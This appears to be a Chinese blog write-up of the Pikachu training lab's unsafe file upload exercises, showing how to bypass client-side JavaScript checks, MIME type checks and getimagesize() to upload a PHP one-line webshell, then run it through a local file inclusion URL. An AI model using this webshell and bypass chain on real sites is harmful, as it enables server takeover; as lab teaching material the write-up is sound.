当前位置：首页 > news >正文

Unsafe upfileupload

news 2025/7/7 11:12:34

文章目录

- - client check
  - MIME Type
  - getimagesize

文件上传功能在web应用系统很常见，比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后，后台会对上传的文件进行判断

比如是否是指定的类型、后缀名、大小等等，然后将其按照设计的格式进行重命名后存储在指定的目录。

如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨，则攻击着可能会上传一些恶意的文件，比如一句话木马，从而导致后台服务器被webshell。

所以，在设计文件上传功能时，一定要对传进来的文件进行严格的安全考虑。比如：

--验证文件类型、后缀名、大小;
--验证文件的上传方式;
--对文件进行一定复杂的重命名;
--不要暴露文件上传后的路径;

client check

上传一句话木马1.php

<?php eval(@$_POST['password']);?>

报错显示说不符合要求

查看页面代码，发现有js函数做验证

前端校验不值一提，直接删除js校验函数

这时候一句话木马已经上传，可以通过蚁剑来连接进入

木马上传的路径

192.168.80.139/pikachu/vul/unsafeupload/uploads/1.php

MIME Type

MIME（多用途互联网邮件扩展类型），是设定某种扩展名的文件用一种应用程序来打开的方式类型，当该扩展文件被访问的时候，浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名，以及一些媒体文件打开方式。
每个MIME类型由两部分组成，前面是数据的大类别，例如声音audio、图像image等，后面定义具体的种类，常见的MIME类型，比如：

超文本标记语言文本.html texthtml
普通文本.txt text/plain
RTF文本.rtf application/rtf
GIF图形.gif image/gif
JPEG图形.ipeg.jpg image/jpeg

继续提交php木马文件，使用Burpsuite抓取数据包，发送到Repeater修改Content-Type

getimagesize

菜鸟教程

Getimagesize是PHP提供的一个用来判断目标文件是不是图片的函数

对文件的开头内容进行了检测并且通过二进制识别是否为图像，那么就可以利用文件头欺骗，来让getimagesize()函数检测无效。

1、制作图片木马方式一

这里用GIF的文件头，在一句话木马前加上GIF的文件头标识，后缀改为png格式

GIF89a
<?php phpinfo(); ?>

图片上传后保存的地址：http://192.168.80.139/pikachu/vul/unsafeupload/uploads/2023/08/16/33780664dccf36108f6808817624.png

通过使用文件包含路径去访问后门文件

http://192.168.80.139/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/08/16/33780664dccf36108f6808817624.png&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

2、制作图片木马方式二

准备一个jpeg格式的图片，还有一个php木马文件

通过CMD命令将两个合成一个ws.jpeg，生成的文件前面内容是2.jpeg，后面是12.php内容

copy /d 2.jpeg + 12.php   ws.jpeg

上传ws.jpeg图片

uploads/2023/08/16/38476764dcd1bd7cf51012008763.jpeg

虽然我们绕过getimagesize()，成功上传图片，但只访问图片里面的php代码是执行不了的

需要通过文件包含路径去访问木马文件

http://192.168.80.139/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/08/16/38476764dcd1bd7cf51012008763.jpeg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

Unsafe upfileupload

文章目录

client check

MIME Type

getimagesize

相关文章：

Unsafe upfileupload

机器人制作开源方案 | 滑板助力器

飞机打方块（二）游戏界面制作

自我理解：精度(precision)和召回(recall)

Nginx 使用 HTTPS（准备证书和私钥）

Java：集合框架：Set集合、LinkedSet集合、TreeSet集合、哈希值、HashSet的底层原理

自定义Taro的navBar的宽度和高度

用Python编程实现百度自然语言处理接口的对接，助力你开发智能化处理程序

系统架构设计专业技能 · 系统工程与系统性能

初识网络原理（笔记）

嵌入式C语言基本操作方法之经典

postgresql \watch实用的使用方法

Cocos2d 项目问题记录

系统架构合理性的思考 | 京东云技术团队

Amelia预订插件：WordPress企业级预约系统

共享门店模式：线下门店的商家如何利用它增加客户

实现矩阵地图与rviz地图重合

设计模式十九：备忘录模式（Memento Pattern）

【题解】二叉搜索树与双向链表

【真实案例】解决后端接口调用偶尔超时问题

HTML 语义化

stm32G473的flash模式是单bank还是双bank？

进程地址空间（比特课总结）

【Linux】C语言执行shell指令

LeetCode - 394. 字符串解码

【android bluetooth 框架分析 04】【bt-framework 层详解 1】【BluetoothProperties介绍】

是否存在路径（FIFOBB算法）

OPENCV形态学基础之二腐蚀

R语言速释制剂QBD解决方案之三

书籍“之“字形打印矩阵(8)0609